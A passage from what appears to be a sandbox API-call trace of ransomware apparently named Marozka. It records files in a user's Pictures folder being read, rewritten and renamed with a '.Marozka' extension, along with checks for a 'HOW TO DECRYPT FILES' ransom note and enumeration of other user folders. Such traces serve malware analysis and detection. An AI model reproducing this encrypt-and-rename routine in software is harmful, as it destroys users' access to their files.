nNumberOfBytesToWrite=0x9c90, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x2669d7c*, lpNumberOfBytesWritten=0x5beab0*=0x9c90, lpOverlapped=0x0) returned 1 [0056.606] CloseHandle (hObject=0x2e0) returned 1 [0056.607] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\VRYDD.jpg", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\VRYDD.jpg", lpFilePart=0x0) returned 0x22 [0056.607] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\VRYDD.jpg.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\VRYDD.jpg.Marozka", lpFilePart=0x0) returned 0x2a [0056.607] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0056.607] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\VRYDD.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\vrydd.jpg"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34e52b30, ftCreationTime.dwHighDateTime=0x1d4cc24, ftLastAccessTime.dwLowDateTime=0x793af470, ftLastAccessTime.dwHighDateTime=0x1d4d068, ftLastWriteTime.dwLowDateTime=0xe4777fdf, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x9c90)) returned 1 [0056.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0056.607] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\VRYDD.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\vrydd.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\VRYDD.jpg.Marozka" (normalized: "c:\\users\\fd1hvy\\pictures\\vrydd.jpg.marozka")) returned 1 [0056.609] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Xswxn8r.png", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\Xswxn8r.png", lpFilePart=0x0) returned 0x24 [0056.609] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0056.609] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Xswxn8r.png" (normalized: "c:\\users\\fd1hvy\\pictures\\xswxn8r.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0056.609] GetFileType (hFile=0x2e0) returned 0x1 [0056.609] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0056.609] GetFileType (hFile=0x2e0) returned 0x1 [0056.609] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x5604 [0056.609] ReadFile (in: hFile=0x2e0, lpBuffer=0x2673e84, nNumberOfBytesToRead=0x5604, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x2673e84*, lpNumberOfBytesRead=0x5beabc*=0x5604, lpOverlapped=0x0) returned 1 [0056.609] CloseHandle (hObject=0x2e0) returned 1 [0056.714] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0056.714] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0056.714] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0056.714] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0056.714] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Xswxn8r.png", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\Xswxn8r.png", lpFilePart=0x0) returned 0x24 [0056.714] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0056.714] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Xswxn8r.png" (normalized: "c:\\users\\fd1hvy\\pictures\\xswxn8r.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0056.715] GetFileType (hFile=0x2e0) returned 0x1 [0056.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0056.715] GetFileType (hFile=0x2e0) returned 0x1 [0056.715] WriteFile (in: hFile=0x2e0, lpBuffer=0x26dbc18*, nNumberOfBytesToWrite=0x5610, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x26dbc18*, lpNumberOfBytesWritten=0x5beab0*=0x5610, lpOverlapped=0x0) returned 1 [0056.716] CloseHandle (hObject=0x2e0) returned 1 [0056.777] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Xswxn8r.png", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\Xswxn8r.png", lpFilePart=0x0) returned 0x24 [0056.777] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Xswxn8r.png.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\Xswxn8r.png.Marozka", lpFilePart=0x0) returned 0x2c [0056.777] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0056.777] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Xswxn8r.png" (normalized: "c:\\users\\fd1hvy\\pictures\\xswxn8r.png"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e801180, ftCreationTime.dwHighDateTime=0x1d4cbf9, ftLastAccessTime.dwLowDateTime=0x7c4e4dc0, ftLastAccessTime.dwHighDateTime=0x1d4cb6c, ftLastWriteTime.dwLowDateTime=0xe491b8bd, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x5610)) returned 1 [0056.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0056.777] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\Xswxn8r.png" (normalized: "c:\\users\\fd1hvy\\pictures\\xswxn8r.png"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\Xswxn8r.png.Marozka" (normalized: "c:\\users\\fd1hvy\\pictures\\xswxn8r.png.marozka")) returned 1 [0056.778] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\ZjQyMrscQl.bmp", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\ZjQyMrscQl.bmp", lpFilePart=0x0) returned 0x27 [0056.778] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0056.778] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\ZjQyMrscQl.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\zjqymrscql.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0056.778] GetFileType (hFile=0x2e0) returned 0x1 [0056.778] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0056.778] GetFileType (hFile=0x2e0) returned 0x1 [0056.778] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x12634 [0056.778] ReadFile (in: hFile=0x2e0, lpBuffer=0x26e16a8, nNumberOfBytesToRead=0x12634, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x26e16a8*, lpNumberOfBytesRead=0x5beabc*=0x12634, lpOverlapped=0x0) returned 1 [0056.778] CloseHandle (hObject=0x2e0) returned 1 [0056.794] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0056.794] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0056.794] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0056.794] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0056.794] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\ZjQyMrscQl.bmp", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\ZjQyMrscQl.bmp", lpFilePart=0x0) returned 0x27 [0056.794] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0056.794] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\ZjQyMrscQl.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\zjqymrscql.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0056.795] GetFileType (hFile=0x2e0) returned 0x1 [0056.796] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0056.796] GetFileType (hFile=0x2e0) returned 0x1 [0056.796] WriteFile (in: hFile=0x2e0, lpBuffer=0x2765764*, nNumberOfBytesToWrite=0x12640, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x2765764*, lpNumberOfBytesWritten=0x5beab0*=0x12640, lpOverlapped=0x0) returned 1 [0056.797] CloseHandle (hObject=0x2e0) returned 1 [0056.799] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\ZjQyMrscQl.bmp", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\ZjQyMrscQl.bmp", lpFilePart=0x0) returned 0x27 [0056.799] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\ZjQyMrscQl.bmp.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\ZjQyMrscQl.bmp.Marozka", lpFilePart=0x0) returned 0x2f [0056.799] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0056.799] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\ZjQyMrscQl.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\zjqymrscql.bmp"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec3cdf0, ftCreationTime.dwHighDateTime=0x1d4d127, ftLastAccessTime.dwLowDateTime=0xf7346c90, ftLastAccessTime.dwHighDateTime=0x1d4d5b2, ftLastWriteTime.dwLowDateTime=0xe4967e69, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x12640)) returned 1 [0056.799] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0056.799] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\ZjQyMrscQl.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\zjqymrscql.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\ZjQyMrscQl.bmp.Marozka" (normalized: "c:\\users\\fd1hvy\\pictures\\zjqymrscql.bmp.marozka")) returned 1 [0056.800] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\_8_bsdUIGPQbiNI.png", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\_8_bsdUIGPQbiNI.png", lpFilePart=0x0) returned 0x2c [0056.800] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0056.800] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\_8_bsdUIGPQbiNI.png" (normalized: "c:\\users\\fd1hvy\\pictures\\_8_bsduigpqbini.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0056.800] GetFileType (hFile=0x2e0) returned 0x1 [0056.800] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0056.800] GetFileType (hFile=0x2e0) returned 0x1 [0056.800] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0xa430 [0056.800] ReadFile (in: hFile=0x2e0, lpBuffer=0x2778250, nNumberOfBytesToRead=0xa430, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x2778250*, lpNumberOfBytesRead=0x5beabc*=0xa430, lpOverlapped=0x0) returned 1 [0056.800] CloseHandle (hObject=0x2e0) returned 1 [0056.867] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0056.867] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0056.867] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0056.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0056.867] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\_8_bsdUIGPQbiNI.png", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\_8_bsdUIGPQbiNI.png", lpFilePart=0x0) returned 0x2c [0056.867] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0056.867] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\_8_bsdUIGPQbiNI.png" (normalized: "c:\\users\\fd1hvy\\pictures\\_8_bsduigpqbini.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0056.868] GetFileType (hFile=0x2e0) returned 0x1 [0056.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0056.868] GetFileType (hFile=0x2e0) returned 0x1 [0056.868] WriteFile (in: hFile=0x2e0, lpBuffer=0x27f8578*, nNumberOfBytesToWrite=0xa440, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x27f8578*, lpNumberOfBytesWritten=0x5beab0*=0xa440, lpOverlapped=0x0) returned 1 [0056.869] CloseHandle (hObject=0x2e0) returned 1 [0056.871] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\_8_bsdUIGPQbiNI.png", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\_8_bsdUIGPQbiNI.png", lpFilePart=0x0) returned 0x2c [0056.871] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\_8_bsdUIGPQbiNI.png.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\_8_bsdUIGPQbiNI.png.Marozka", lpFilePart=0x0) returned 0x34 [0056.871] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0056.871] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\_8_bsdUIGPQbiNI.png" (normalized: "c:\\users\\fd1hvy\\pictures\\_8_bsduigpqbini.png"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb1ff090, ftCreationTime.dwHighDateTime=0x1d4cd25, ftLastAccessTime.dwLowDateTime=0x13929900, ftLastAccessTime.dwHighDateTime=0x1d4d425, ftLastWriteTime.dwLowDateTime=0xe4a00721, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xa440)) returned 1 [0056.871] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0056.871] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\_8_bsdUIGPQbiNI.png" (normalized: "c:\\users\\fd1hvy\\pictures\\_8_bsduigpqbini.png"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\_8_bsdUIGPQbiNI.png.Marozka" (normalized: "c:\\users\\fd1hvy\\pictures\\_8_bsduigpqbini.png.marozka")) returned 1 [0056.985] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0056.985] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpFilePart=0x0) returned 0x24 [0056.985] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0xa7d888 [0056.986] FindNextFileW (in: hFindFile=0xa7d888, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0056.986] FindNextFileW (in: hFindFile=0xa7d888, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0056.986] FindNextFileW (in: hFindFile=0xa7d888, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 0 [0056.986] FindClose (in: hFindFile=0xa7d888 | out: hFindFile=0xa7d888) returned 1 [0056.986] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab0) returned 1 [0056.986] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beabc) returned 1 [0056.986] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0056.986] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpFilePart=0x0) returned 0x24 [0056.987] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0xa7d748 [0056.987] FindNextFileW (in: hFindFile=0xa7d748, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0056.987] FindNextFileW (in: hFindFile=0xa7d748, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0056.987] FindNextFileW (in: hFindFile=0xa7d748, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 0 [0056.987] FindClose (in: hFindFile=0xa7d748 | out: hFindFile=0xa7d748) returned 1 [0056.987] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab0) returned 1 [0056.987] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beabc) returned 1 [0056.987] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0056.987] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpFilePart=0x0) returned 0x27 [0056.987] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0xa7dcc8 [0056.988] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0056.988] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0056.988] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 0 [0056.988] FindClose (in: hFindFile=0xa7dcc8 | out: hFindFile=0xa7dcc8) returned 1 [0056.988] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab0) returned 1 [0056.988] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beabc) returned 1 [0056.988] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0056.988] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpFilePart=0x0) returned 0x27 [0056.988] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0xa7d888 [0056.988] FindNextFileW (in: hFindFile=0xa7d888, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0056.988] FindNextFileW (in: hFindFile=0xa7d888, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0056.988] FindNextFileW (in: hFindFile=0xa7d888, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 0 [0056.989] FindClose (in: hFindFile=0xa7d888 | out: hFindFile=0xa7d888) returned 1 [0056.989] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab0) returned 1 [0056.989] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beabc) returned 1 [0056.989] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beb68) returned 1 [0056.989] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music", nBufferLength=0x105, lpBuffer=0x5be61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music", lpFilePart=0x0) returned 0x15 [0056.989] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\*", lpFindFileData=0x5be890 | out: lpFindFileData=0x5be890) returned 0xa7dcc8 [0056.989] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0056.989] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0056.989] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0056.990] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0056.990] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0056.990] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0056.990] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0056.990] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0056.990] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0056.990] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0056.991] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0056.991] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0056.991] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 0 [0056.991] FindClose (in: hFindFile=0xa7dcc8 | out: hFindFile=0xa7dcc8) returned 1 [0056.991] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb24) returned 1 [0056.991] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb30) returned 1 [0056.991] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beb68) returned 1 [0056.991] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music", nBufferLength=0x105, lpBuffer=0x5be61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music", lpFilePart=0x0) returned 0x15 [0056.991] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\*", lpFindFileData=0x5be890 | out: lpFindFileData=0x5be890) returned 0xa7dcc8 [0056.992] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0056.992] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0056.992] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0056.992] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0056.992] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0056.993] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0056.993] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0056.993] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0056.993] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0056.993] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0056.993] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be89c | out: 